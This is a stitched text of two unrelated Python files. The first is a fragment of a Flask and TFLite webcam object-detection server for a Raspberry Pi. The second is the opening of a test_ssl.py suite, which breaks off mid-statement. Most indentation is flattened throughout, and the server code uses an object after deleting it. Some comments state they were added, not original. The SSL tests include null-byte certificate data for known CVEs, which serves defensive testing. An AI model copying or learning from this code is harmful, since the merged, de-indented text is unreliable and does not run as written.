os.environ['kill_tensorFlow'] = 'True'
#Restore Tensor Flow
if first_char == 'r':
os.environ['kill_tensorFlow'] = 'False'
#print('Restore Tensor Flow')
#Custom model changed -
if first_char == 'c':
chunks = sfCommand.split(",")
model_changed_to = str(chunks[1])
print('Custom Model changed to: '+model_changed_to)
filehandler = open('model.obj','wb')
pickle.dump(model_changed_to,filehandler)
filehandler.close()
os.environ['run_model'] = model_changed_to
#rerun
os.environ['quit_flag'] = 'quit'
#PreLoaded model changed
if first_char == 'm':
chunks = sfCommand.split(",")
model_changed_to = str(chunks[1])
print('PreLoaded Model changed to: '+model_changed_to)
filehandler = open('model.obj','wb')
pickle.dump(model_changed_to,filehandler)
filehandler.close()
os.environ['run_model'] = model_changed_to
#rerun
os.environ['quit_flag'] = 'quit'
#Check if directory exists
if first_char == 'd':
print('check if directory exists')
chunks = sfCommand.split(",")
global annotatePath
annotatePath = '/home/pi/SensorFusion/Pictures/'+ str(chunks[1])
print('Py Checking Path: ',annotatePath)
isDir = os.path.exists(annotatePath)
            print('Directory checked, isDir = ' + str(isDir))
if isDir:
message = {'statusText':'true'}
                print('Directory Exists')
return 'Forbidden', 403
else:
message = {'statusText':'false'}
print('Directory Does not Exist')
return 'OK', 200
#Annotate
if sfCommand == 'annotate':
capture_flag = os.environ['cap_flag'] = 'True'
print('Capture Flag Command =',capture_flag)
#Labels
elif sfCommand == 'scores_off':
os.environ['scores_flag'] = sfCommand
print('Toggle Scores Command =', os.environ['scores_flag'])
elif sfCommand == 'scores_on':
os.environ['scores_flag'] = sfCommand
print('Toggle Scores Command =', os.environ['scores_flag'])
elif sfCommand == 'labels_off':
os.environ['labels_flag'] = sfCommand
print('Toggle Labels Command =', os.environ['labels_flag'])
elif sfCommand == 'labels_on':
os.environ['labels_flag'] = sfCommand
print('Toggle Labels Command =', os.environ['labels_flag'])
elif sfCommand == 'fps':
            global fps_flag  # module-level flag toggled by the 'fps' command
if fps_flag == False:#Show/Hide Frames per second
fps_flag = True
else:
fps_flag = False
elif sfCommand == 'quit':
os.environ['quit_flag'] = sfCommand
            print('Quit command received')
return 'OK', 200
# GET request
else:
print('GET Request from Client')
#session['cap_flag'] = True
#print(session.get('capt_flag'))
os.environ['cap_flag'] = 'True'
print('Capture Flag Command =', os.environ['cap_flag'])
message = {'Capture':'Capturing Images!'}
return jsonify(message) # serialize and use JSON headers
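# Hedged usage sketch (not part of the original client; the host and port are assumptions):
# the '/api' route above accepts a JSON-encoded command string such as 'labels_off',
# 'scores_on', 'fps', 'quit', 'k'/'r' (kill/restore TensorFlow), 'c,<model>' or 'm,<model>'
# (switch model), 'd,<dir>' (check whether an annotation directory exists) and
# 'a,<name>,<count>' (start annotation capture). A minimal way to drive it from Python
# with the requests package:
def _example_send_sf_command(command, base_url='http://localhost:5000'):
    import requests  # third-party dependency assumed for this sketch only
    return requests.post(base_url + '/api', json=command)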
@app.route('/login')
def login():
embedVar='Login'
return render_template('login.html',embed=embedVar )
@app.route('/register')
def register():
embedVar='Register'
return render_template('register.html',embed=embedVar )
@app.route('/video_feed')
def video_feed():
#Video streaming route: goes into src attribute of an img tag
print('\nin FLASK: locals() value inside class\n', locals())
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
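# Sketch (added for clarity, not part of the original code): the Response above relies on the
# multipart/x-mixed-replace MJPEG convention, where the generator yields one JPEG per part and
# the browser's <img src="/video_feed"> keeps replacing the image as new parts arrive. Reduced
# to its essentials, a frame generator for that mimetype looks like this:
def _example_mjpeg_part_generator(jpeg_frames):
    for jpeg_bytes in jpeg_frames:  # each item: one already-encoded JPEG image as bytes
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + jpeg_bytes + b'\r\n')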
# ============================
def gen_frames():
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream(object):
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30,target=None,args=()):
global capture_image_limit
capture_image_limit = 2000
global file_save_id
file_save_id =0
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
#VideoStream Instance
instance = VideoStream.__qualname__
print('The class instance is: ',instance)
#print('\nVIDEOSTREAM: locals() value inside class\n', locals())
#print(dir(VideoStream))
#Reload
reloadClass = os.environ.get('reload')
if reloadClass == 'True':
print('Delete Self:')
del self
os.environ['reload'] = 'False'
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def __del__(self):
print ("Object destroyed");
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
this_instance = self
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
args = parser.parse_args()
MODEL_NAME = args.modeldir
print('~~~~ Param Default Model Name: ' + str(MODEL_NAME))
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
print('TPU Runtime' + str(pkg))
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
# Multi-Model
# Demo90 /home/pi/SensorFusion/Demo90
# Deer: /home/pi/SensorFusion/PreLoadedModels/Model01.Deer
# Head: /home/pi/SensorFusion/PreLoadedModels/Model02.Head
# Eyes: /home/pi/SensorFusion/PreLoadedModels/Model03.Eyes
# Tree: /home/pi/SensorFusion/PreLoadedModels/Model04.Tree
# check.id - cd /home/pi/SensorFusion/checkid
CWD_PATH = os.getcwd()
print("Default Path: "+ CWD_PATH)
newModel = str(os.environ.get('run_model'))
print("New Model Name: "+ newModel)
if newModel == "Demo90":
CWD_PATH = "/home/pi/SensorFusion/"+ newModel
elif newModel == 'Check.ID':
CWD_PATH = "/home/pi/SensorFusion/checkid"
else:
CWD_PATH = "/home/pi/SensorFusion/PreLoadedModels/"+ newModel
print("Current Model Path: "+ CWD_PATH)
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
print("Current Path to Label Map: "+ PATH_TO_LABELS)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
#if video_camera_flag:#Using a Flag here - for future use
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print('TPU Detected' + PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
print('No TPU detected!'+ PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
global img_counter
img_counter = 0
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
try:
while True:
#while video_camera_flag:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
global frame
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
person_found = False
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
            #Kill TensorFlow while Annotating
            kill_tensorFlow = os.environ.get('kill_tensorFlow')
            #print("TensorFlow Status: " + str(kill_tensorFlow))
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
#print("Kill TF Flag: "+ str(kill_tensorFlow))
if kill_tensorFlow != 'True':
try:
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 3)
except:
pass
# Draw label (object_name) and score (%)
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
#print(labels[int(classes[i])]+": "+str(i))
if labels[int(classes[0])]== 'person':#NOTE - The bar is for one person only
#print('Person Found!')
person_found = True# used for bar below
scores_flag = os.environ.get('scores_flag')
labels_flag = os.environ.get('labels_flag')
#states
state_ = 11 #both on by default
if labels_flag == 'labels_off' and scores_flag == 'scores_off':
state_ = 0#00
                        label = ''  # nothing is drawn in this state, so the label stays empty
if labels_flag == 'labels_on' and scores_flag == 'scores_on':
state_ = 11#11
label = '%s: %d%%' % (object_name.capitalize(), int(scores[i]*100)) # Example: 'person: 72%'
if labels_flag == 'labels_off' and scores_flag == 'scores_on':
label = '%d%%' % (int(scores[i]*100)) # Example: '72%'
state_ = 1#01
if labels_flag == 'labels_on' and scores_flag == 'scores_off':
state_= 10 #10
label = '%s: ' % (object_name.capitalize()) # Example: 'person: '
#draw the labels, background score and box
if state_ != 0:
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
#cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (237,237,237), cv2.FILLED) # Draw white box to put label text in
if kill_tensorFlow != 'True':
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (128,128,128), cv2.FILLED) # Draw gray box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2) # Draw label text
else:
if kill_tensorFlow != 'True':
cv2.rectangle(frame, (xmin,ymin), (xmin,ymin), (237,237,237), cv2.FILLED) # Draw frame with no label OR score text !
# Draw framerate in corner of frame - use 'F' key to toggle on/off
try:
if fps_flag:
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
else:
pass
except:
pass
#If Capture Image Draw status text
capture_flag = os.environ.get('cap_flag')
try:
if capture_flag == "True":
cv2.putText(frame,'Saving File: '+str(img_counter),(520,50),cv2.FONT_HERSHEY_SIMPLEX,0.6,(0,0,255),2)
else:
pass
except:
pass
# All the results have been drawn on the frame, so it's time to display it.
#cv2.imshow('Object detector', frame) ## Commented for the FLASK API
#Module widgets.meter()
if kill_tensorFlow != 'True':
#window_name ='Object detector'
top = int(scores[0]*100)
color = (0,0,255)
if person_found == True:
widgets.meter(frame,top)#module
#End Module
# Displaying the image - DO NOT USE!
#cv2.imshow(window_name, image)
            #SENSOR FUSION Flask VIDEO API
            #Brute-force Motion JPEG: OpenCV captures raw frames, so each frame must be encoded
            #to JPEG before the browser can display the stream correctly.
            #NOTE: cv2.imencode + tobytes slows the apparent frame rate by about 50%, and the UI
            #adds some overhead of its own.
            #See: https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
ret, buffer = cv2.imencode('.jpg', frame)
frame2 = buffer.tobytes() #the image that is saved
#Capture Images and save to Annotate Named subdirectory under ~/Pictures
#capture_flag = os.environ.get('cap_flag')
annotate_name = os.environ.get('annotate_name')
if capture_flag == 'True':
#Check limit
try:
print("image limit: " + anno_images)
capture_image_limit = int(anno_images)
except:
pass
if capture_flag == 'True' and img_counter < capture_image_limit:
#Create new or use existing directory
path_to_directory = '../Pictures/' + annotate_name
print("Saving to ", path_to_directory)
try:
os.makedirs(path_to_directory)
except FileExistsError:
#dir already exists, so overwrite existing (unless we datestamp)!
pass
img_name="../Pictures/"+annotate_name+"/"+annotate_name+"sf-frame_{}.jpg".format(img_counter)
cv2.namedWindow("Capture Window")
cv2.moveWindow("Capture Window", -500, -500)# push it off screen :)
cv2.imwrite(img_name, frame1)
print('Wrote Image-'+ img_name)
img_counter +=1
#Clear Capture Flag when done grabbing images
if capture_flag == 'True' and img_counter >= capture_image_limit:
os.environ['cap_flag'] = 'False'
img_counter = 0
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame2 + b'\r\n') # concat frame one by one and show result
## End Video Stream API ###
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
print("CV2 Break")
break
            # Quit when the web client has sent the 'quit' command
quit_flag = os.environ.get('quit_flag')
if quit_flag == 'quit':#
os.environ['quit_flag'] = ''
print("CV2 Quit " + quit_flag)
cv2.destroyAllWindows()
if videostream:
#videostream.release()
videostream.stop()
print('Videostream stopped')
break
#print("quit_flag " + str(quit_flag))
# Clean up
cv2.destroyAllWindows()
if videostream:
#videostream.release()
videostream.stop()
#os.system("pkill chromium")
#webbrowser.open('http://localhost:5000', new=0)
except KeyboardInterrupt:
pass
######### run api #########
if __name__ == '__main__':
app.debug = True
app.run()
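# Run note (assumed invocation, not from the original docs): gen_frames() builds an argparse
# parser with a required --modeldir argument, so the process must be started with --modeldir
# on the command line (it is parsed when the first /video_feed request runs), e.g.
#   python TFLite_detection_webcam_api.py --modeldir <your_model_folder>
# app.run() above uses Flask's defaults, i.e. http://127.0.0.1:5000, with debug enabled.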
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
file = os.path.join(os.path.dirname(__file__), *name)
# Ensure we return unicode path. This tweak is not a divergence:
# CPython 2.7.13 fails the same way for a non-ascii location.
if isinstance(file, unicode):
return file
else:
return file.decode(sys.getfilesystemencoding())
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
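# Clarifying note (matches the stdlib ssl docs): the version tuples compared by the helpers in
# this file are five-tuples of the form (major, minor, fix, patch, status); e.g. (0, 9, 8, 13, 15)
# reads as "OpenSSL 0.9.8m, release build" (patch 13 is the letter 'm', status 15 means a release).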
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # socket.error raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
if support.get_java_version() < (9,):
# FIXME: Fails on Java 9+. See b.j.o. issue #2710. A similar issue is seen in
# test_load_cert_chain - apparently this RSA 1024 cert is too weak and gets a
# java.security.KeyStoreException: Key protection algorithm not found before the
# ValueError raised on earlier versions of Java;
# but we need to confirm this is truly the case on Java 9
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
